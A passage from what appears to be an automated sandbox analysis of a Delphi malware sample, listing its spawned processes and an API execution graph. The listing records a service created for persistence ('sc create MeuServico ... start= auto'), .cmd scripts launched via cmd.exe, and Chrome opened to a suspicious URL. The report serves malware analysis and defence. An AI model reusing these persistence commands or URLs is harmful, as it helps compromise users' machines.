                                                                      MD5 hash:768B35409005592DE2333371C6253BC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Antivirus matches:
                                                                      • Detection: 3%, ReversingLabs
                                                                      • Detection: 5%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:6
                                                                      Start time:13:04:39
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
                                                                      Imagebase:0x7ff7fbe50000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:13:04:40
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:13:04:40
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:13:04:40
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
                                                                      Imagebase:0xdb0000
                                                                      File size:61'440 bytes
                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\SysWOW64\sc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:sc start MeuServico
                                                                      Imagebase:0xdb0000
                                                                      File size:61'440 bytes
                                                                      MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.2046975605.00000000008D1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:13:04:41
                                                                      Start date:01/06/2024
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php
                                                                      Imagebase:0x7ff76e190000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:14
                                                                      Start time:13:04:42
                                                                      Start date:01/06/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff6eef20000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:15
                                                                      Start time:13:04:43
                                                                      Start date:01/06/2024
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                      Imagebase:0x7ff76e190000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:16
                                                                      Start time:13:04:48
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:17
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:18
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000012.00000002.4174481109.0000000000901000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:19
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000013.00000002.4175193752.0000000000981000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:20
                                                                      Start time:13:04:49
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.4175517301.0000000000911000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:21
                                                                      Start time:13:04:50
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000002.4164202689.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:23
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.4175775360.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:24
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000018.00000002.4174825409.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:25
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:26
                                                                      Start time:13:04:52
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001A.00000002.4175519677.0000000000951000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:29
                                                                      Start time:13:05:14
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:30
                                                                      Start time:13:05:14
                                                                      Start date:01/06/2024
                                                                      Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
                                                                      Imagebase:0x400000
                                                                      File size:1'626'280 bytes
                                                                      MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Has exited:false

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:1.3%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:14.1%
                                                                        Total number of Nodes:347
                                                                        Total number of Limit Nodes:9
                                                                        execution_graph 34503 af7e5e 34504 af7e6a __FrameHandler3::FrameUnwindToState 34503->34504 34529 af79c1 34504->34529 34506 af7e71 34507 af7fc4 34506->34507 34518 af7e9b ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 34506->34518 34576 af83bd 4 API calls 2 library calls 34507->34576 34509 af7fcb 34577 b0854c 23 API calls __FrameHandler3::FrameUnwindToState 34509->34577 34511 af7fd1 34578 b08510 23 API calls __FrameHandler3::FrameUnwindToState 34511->34578 34513 af7fd9 34514 af7eba 34515 af7f3b 34540 af84d8 34515->34540 34517 af7f41 34544 ae1a20 GetCommandLineW 34517->34544 34518->34514 34518->34515 34575 b08526 41 API calls 3 library calls 34518->34575 34530 af79ca 34529->34530 34579 af801c IsProcessorFeaturePresent 34530->34579 34532 af79d6 34580 afae59 10 API calls 2 library calls 34532->34580 34534 af79db 34539 af79df 34534->34539 34581 b08fb0 34534->34581 34537 af79f6 34537->34506 34539->34506 34640 af8e90 34540->34640 34542 af84eb GetStartupInfoW 34543 af84fe 34542->34543 34543->34517 34545 ae1a60 34544->34545 34641 ad4ec0 LocalAlloc 34545->34641 34547 ae1a71 34642 ad8ba0 34547->34642 34549 ae1ac9 34550 ae1add 34549->34550 34551 ae1acd 34549->34551 34650 ae0b70 LocalAlloc LocalAlloc 34550->34650 34698 ad8790 81 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 34551->34698 34554 ae1ad6 34556 ae1c26 ExitProcess 34554->34556 34555 ae1ae9 34651 ae0e90 34555->34651 34562 ae1b2b 34669 adae00 34562->34669 34564 ae1b82 34565 ad29d0 44 API calls 34564->34565 34567 ae1bb4 34564->34567 34565->34567 34570 ae1c08 34567->34570 34675 ad8e20 34567->34675 34568 ae1bef 34569 ae1bfb 34568->34569 34568->34570 34699 ae1400 CreateFileW SetFilePointer WriteFile CloseHandle 34569->34699 34700 ad4000 42 API calls 34570->34700 34573 ae1c17 34701 ae1c30 LocalFree LocalFree 34573->34701 34575->34515 34576->34509 34577->34511 34578->34513 34579->34532 34580->34534 34585 b1154e 34581->34585 34584 afae78 7 API calls 2 library calls 34584->34539 34586 af79e8 34585->34586 34587 b1155e 34585->34587 34586->34537 34586->34584 34587->34586 34589 b0c2f6 34587->34589 34590 b0c302 __FrameHandler3::FrameUnwindToState 34589->34590 34601 b072ca EnterCriticalSection 34590->34601 34592 b0c309 34602 b11abc 34592->34602 34597 b0c322 34616 b0c246 GetStdHandle GetFileType 34597->34616 34598 b0c338 34598->34587 34600 b0c327 34617 b0c34d LeaveCriticalSection std::_Lockit::~_Lockit 34600->34617 34601->34592 34603 b11ac8 __FrameHandler3::FrameUnwindToState 34602->34603 34604 b11ad1 34603->34604 34605 b11af2 34603->34605 34626 afc6b0 14 API calls std::_Stofx_v2 34604->34626 34618 b072ca EnterCriticalSection 34605->34618 34608 b11ad6 34627 afc5b2 41 API calls collate 34608->34627 34610 b0c318 34610->34600 34615 b0c190 44 API calls 34610->34615 34611 b11b2a 34628 b11b51 LeaveCriticalSection std::_Lockit::~_Lockit 34611->34628 34612 b11afe 34612->34611 34619 b11a0c 34612->34619 34615->34597 34616->34600 34617->34598 34618->34612 34629 b0c72b 34619->34629 34621 b11a2b 34637 b0aa28 14 API calls 2 library calls 34621->34637 34623 b11a1e 34623->34621 34636 b0cddf 6 API calls std::_Locinfo::_Locinfo_dtor 34623->34636 34624 b11a80 34624->34612 34626->34608 34627->34610 34628->34610 34634 b0c738 __cftoe 34629->34634 34630 b0c778 34639 afc6b0 14 API calls std::_Stofx_v2 34630->34639 34631 b0c763 RtlAllocateHeap 34632 b0c776 34631->34632 34631->34634 34632->34623 34634->34630 34634->34631 34638 b115f6 EnterCriticalSection LeaveCriticalSection __cftoe 34634->34638 34636->34623 34637->34624 34638->34634 34639->34632 34640->34542 34641->34547 34643 ad8bf2 34642->34643 34644 ad8c34 34643->34644 34647 ad8c22 34643->34647 34645 af7708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34644->34645 34646 ad8c42 34645->34646 34646->34549 34702 af7708 34647->34702 34649 ad8c30 34649->34549 34650->34555 34652 ae0ea4 34651->34652 34657 ae1242 34651->34657 34653 ae12a0 34652->34653 34652->34657 34710 ad83e0 14 API calls 34653->34710 34655 ae12b0 RegOpenKeyExW 34656 ae12ce RegQueryValueExW 34655->34656 34655->34657 34656->34657 34658 ad29d0 34657->34658 34659 ad29f1 34658->34659 34659->34659 34711 ad3b40 34659->34711 34661 ad2a09 34662 ad9110 34661->34662 34730 ad2a10 34662->34730 34664 ad9156 34748 ad98d0 34664->34748 34670 adae0d 34669->34670 34671 adae0a 34669->34671 34674 adae1a 34670->34674 34796 b00f1e 42 API calls 2 library calls 34670->34796 34671->34564 34673 adae2d 34673->34564 34674->34564 34676 ad8e69 34675->34676 34677 ad8e54 34675->34677 34797 ad5f90 GetCurrentProcess OpenProcessToken 34676->34797 34677->34568 34679 ad8e7c 34680 ad8f3e 34679->34680 34682 ad8e96 34679->34682 34802 ad1fc0 67 API calls 34680->34802 34854 ad1fc0 67 API calls 34682->34854 34683 ad8f65 34803 ad1fc0 67 API calls 34683->34803 34686 ad8eaa 34855 ad1fc0 67 API calls 34686->34855 34687 ad8f7a 34804 ad1fc0 67 API calls 34687->34804 34690 ad8ec7 34856 ad1fc0 67 API calls 34690->34856 34691 ad8f8b 34805 ad7660 34691->34805 34694 ad8ed5 34857 ad6ee0 161 API calls 3 library calls 34694->34857 34695 ad8fa4 34695->34568 34697 ad8eed 34697->34695 34698->34554 34699->34570 34700->34573 34701->34556 34703 af7711 IsProcessorFeaturePresent 34702->34703 34704 af7710 34702->34704 34706 af7bd9 34703->34706 34704->34649 34709 af7b9c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34706->34709 34708 af7cbc 34708->34649 34709->34708 34710->34655 34712 ad3c15 34711->34712 34718 ad3b54 34711->34718 34728 ad3680 42 API calls collate 34712->34728 34713 ad3b60 __Strxfrm 34713->34661 34715 ad3b8d 34719 ad3c10 34715->34719 34723 ad3bbf LocalAlloc 34715->34723 34716 ad3c1a 34729 afc5c2 41 API calls 2 library calls 34716->34729 34718->34713 34718->34715 34718->34719 34722 ad3bd7 34718->34722 34727 ad3af0 RaiseException _com_raise_error collate 34719->34727 34725 ad3bdb LocalAlloc 34722->34725 34726 ad3be8 __Strxfrm 34722->34726 34723->34716 34724 ad3bcc 34723->34724 34724->34726 34725->34726 34726->34661 34735 ad2a36 34730->34735 34731 ad2afc 34786 ad3680 42 API calls collate 34731->34786 34733 ad2a52 __Strxfrm 34733->34664 34734 ad2b01 34787 afc5c2 41 API calls 2 library calls 34734->34787 34735->34731 34735->34733 34736 ad2a77 34735->34736 34738 ad2af7 34735->34738 34739 ad2ac1 34735->34739 34736->34738 34740 ad2aa9 LocalAlloc 34736->34740 34785 ad3af0 RaiseException _com_raise_error collate 34738->34785 34743 ad2ac5 LocalAlloc 34739->34743 34747 ad2ad2 __Strxfrm 34739->34747 34740->34734 34742 ad2ab6 34740->34742 34742->34747 34743->34747 34747->34664 34749 ad992a 34748->34749 34756 ad9a92 34748->34756 34753 ad9955 34749->34753 34749->34756 34750 ad9a79 34751 af7708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34750->34751 34752 ad916b 34751->34752 34775 ad9bf0 34752->34775 34754 ad9bd1 34753->34754 34755 ad9972 34753->34755 34791 ad4650 42 API calls 34754->34791 34757 ad3b40 44 API calls 34755->34757 34756->34750 34758 ad9bdb 34756->34758 34759 ad9aeb 34756->34759 34761 ad9996 34757->34761 34793 ad4650 42 API calls 34758->34793 34762 ad3b40 44 API calls 34759->34762 34788 ad9ef0 45 API calls __Strxfrm 34761->34788 34766 ad9b0f 34762->34766 34763 ad9bd6 34792 afc5c2 41 API calls 2 library calls 34763->34792 34790 ad3cc0 42 API calls collate 34766->34790 34769 ad99b1 34789 ad3cc0 42 API calls collate 34769->34789 34772 ad99fa 34772->34750 34772->34763 34773 ad9a6e 34772->34773 34773->34750 34774 ad9a72 LocalFree 34773->34774 34774->34750 34784 ad9c6c __Strxfrm 34775->34784 34776 ad9183 34776->34562 34777 ad9e96 34777->34776 34779 ad9eb0 LocalFree 34777->34779 34778 ad9ee0 34794 afc5c2 41 API calls 2 library calls 34778->34794 34779->34776 34781 ad9ee5 34795 ad4650 42 API calls 34781->34795 34784->34776 34784->34777 34784->34778 34784->34781 34788->34769 34789->34772 34790->34750 34796->34673 34798 ad5fb7 GetTokenInformation 34797->34798 34799 ad5fb1 34797->34799 34800 ad5fee CloseHandle 34798->34800 34801 ad5fe6 34798->34801 34799->34679 34800->34679 34801->34800 34802->34683 34803->34687 34804->34691 34806 ad76d1 34805->34806 34858 ad2100 34806->34858 34808 ad76e9 34809 ad2100 42 API calls 34808->34809 34810 ad7700 34809->34810 34874 ad7db0 34810->34874 34812 ad7718 34813 ad7a7b 34812->34813 34814 ad7747 34812->34814 34894 ad2750 41 API calls 34812->34894 34900 ad1910 LocalFree RaiseException _com_raise_error 34813->34900 34891 b00d39 34814->34891 34818 ad7a85 GetWindowThreadProcessId 34819 ad7aae GetWindowLongW 34818->34819 34820 ad7ae1 34818->34820 34819->34695 34820->34695 34822 ad7766 34823 ad2100 42 API calls 34822->34823 34824 ad777b 34823->34824 34829 ad7816 GetWindowsDirectoryW 34824->34829 34843 ad784f 34824->34843 34825 ad78ad 34827 ad78bd ShellExecuteExW 34825->34827 34826 ad78a4 GetForegroundWindow 34826->34825 34828 ad78ce 34827->34828 34834 ad78d7 34827->34834 34897 ad7c30 6 API calls 34828->34897 34895 ad1980 70 API calls 34829->34895 34831 ad7912 34837 ad7938 GetModuleHandleW GetProcAddress GetProcessId AllowSetForegroundWindow 34831->34837 34838 ad79cb 34831->34838 34833 ad78ed ShellExecuteExW 34833->34831 34836 ad7909 34833->34836 34834->34831 34834->34833 34835 ad7837 34896 ad1980 70 API calls 34835->34896 34898 ad7c30 6 API calls 34836->34898 34837->34838 34841 ad7960 34837->34841 34842 ad79f2 34838->34842 34846 ad79dc WaitForSingleObject GetExitCodeProcess 34838->34846 34841->34838 34845 ad7969 GetModuleHandleW GetProcAddress 34841->34845 34899 ad7d30 CloseHandle 34842->34899 34843->34825 34843->34826 34847 ad79c8 34845->34847 34848 ad7984 34845->34848 34846->34842 34847->34838 34848->34847 34850 ad7995 Sleep EnumWindows 34848->34850 34849 ad79fe 34851 af7708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34849->34851 34850->34848 34852 ad79c1 BringWindowToTop 34850->34852 34853 ad7a73 34851->34853 34852->34847 34853->34695 34854->34686 34855->34690 34856->34694 34857->34697 34859 ad210b 34858->34859 34860 ad211a 34859->34860 34861 ad21ba 34859->34861 34865 ad2137 codecvt 34859->34865 34860->34808 34863 ad21bf HeapAlloc 34861->34863 34862 ad215e 34901 afc6b0 14 API calls std::_Stofx_v2 34862->34901 34863->34808 34865->34862 34869 ad217d __Strxfrm 34865->34869 34870 ad219f 34865->34870 34866 ad2163 34902 afc5b2 41 API calls collate 34866->34902 34868 ad216e 34868->34808 34869->34808 34870->34869 34903 afc6b0 14 API calls std::_Stofx_v2 34870->34903 34872 ad21a8 34904 afc5b2 41 API calls collate 34872->34904 34875 ad7e1b 34874->34875 34876 ad7deb 34874->34876 34885 ad7e2c 34875->34885 34905 ad2510 56 API calls 34875->34905 34877 ad2100 42 API calls 34876->34877 34878 ad7df0 34877->34878 34878->34812 34880 ad7eda 34909 ad1910 LocalFree RaiseException _com_raise_error 34880->34909 34881 ad7ed0 34908 ad1910 LocalFree RaiseException _com_raise_error 34881->34908 34884 ad7ee9 34885->34880 34885->34881 34886 ad7e7c 34885->34886 34887 ad7ea1 34886->34887 34906 afc6b0 14 API calls std::_Stofx_v2 34886->34906 34887->34812 34889 ad7e96 34907 afc5b2 41 API calls collate 34889->34907 34910 b00d50 34891->34910 34894->34814 34895->34835 34896->34843 34897->34834 34898->34831 34899->34849 34900->34818 34901->34866 34902->34868 34903->34872 34904->34869 34905->34885 34906->34889 34907->34887 34908->34880 34909->34884 34915 b00904 34910->34915 34916 b00922 34915->34916 34922 b0091b 34915->34922 34916->34922 34960 b0ae3c 41 API calls 3 library calls 34916->34960 34918 b00943 34961 b0b175 41 API calls __Getctype 34918->34961 34920 b00959 34962 b0b1d3 41 API calls __cftoe 34920->34962 34923 b00bc0 34922->34923 34924 b00bf0 ___crtCompareStringW 34923->34924 34925 b00bda 34923->34925 34924->34925 34928 b00c07 34924->34928 34963 afc6b0 14 API calls std::_Stofx_v2 34925->34963 34927 b00bdf 34964 afc5b2 41 API calls collate 34927->34964 34933 b00be9 34928->34933 34965 b0c622 6 API calls 2 library calls 34928->34965 34931 b00c55 34934 b00c76 34931->34934 34935 b00c5f 34931->34935 34932 af7708 